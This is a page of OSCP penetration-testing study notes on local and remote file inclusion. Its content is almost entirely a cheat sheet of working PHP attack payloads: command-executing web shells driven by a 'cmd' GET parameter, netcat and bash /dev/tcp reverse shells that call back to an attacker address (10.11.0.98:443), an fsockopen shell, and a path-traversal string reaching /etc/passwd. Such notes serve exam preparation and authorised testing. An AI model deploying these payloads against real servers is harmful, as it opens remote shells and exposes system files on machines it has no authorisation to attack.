💻
oscp-study-notes
  • What is this?
  • Scanning & Enumeration
    • FTP 21
    • SMTP 25
    • HTTP/HTTPS 80/443/*
    • SMB 139/443
  • Vulnerabilites & Exploitation
    • Socket Programming
    • Generate shellcodes
    • Shellshock
    • Cross Compiling
    • LFI/RFI
    • SQL Injection
    • CVE2009-3103
    • MS17-010
  • Privilege Escalation
  • File Transfers
  • Buffer Overflow
  • Port Redirection and Tunneling
  • Password Cracking
  • Proof
  • Netcat
  • Third-party Tools
  • Bypass AV
  • Methodology
  • Writing a report
  • Further Reading
Powered by GitBook
On this page
  • Reverse TCP shell without netcat
  • Notes
  • References

Was this helpful?

  1. Vulnerabilites & Exploitation

LFI/RFI

Pentestmonkeys /usr/share/webshells/php/php-reverse-shell.php

<?php echo shell_exec("nc $TARGET_IP -e /bin/sh") ?>
<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>

Reverse TCP shell without netcat

<?php echo shell_exec('/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1');?>
<?php $sock=fsockopen("127.0.0.1",1337); exec("/bin/sh -i <&3 >&3 2>&3");?>
../../../../../../../../../etc/passwd

Notes

  • Some versions of netcat does not support -e flag

References

  • https://awakened1712.github.io/oscp/oscp-lfi-rfi/

PreviousCross CompilingNextSQL Injection

Last updated 4 years ago

Was this helpful?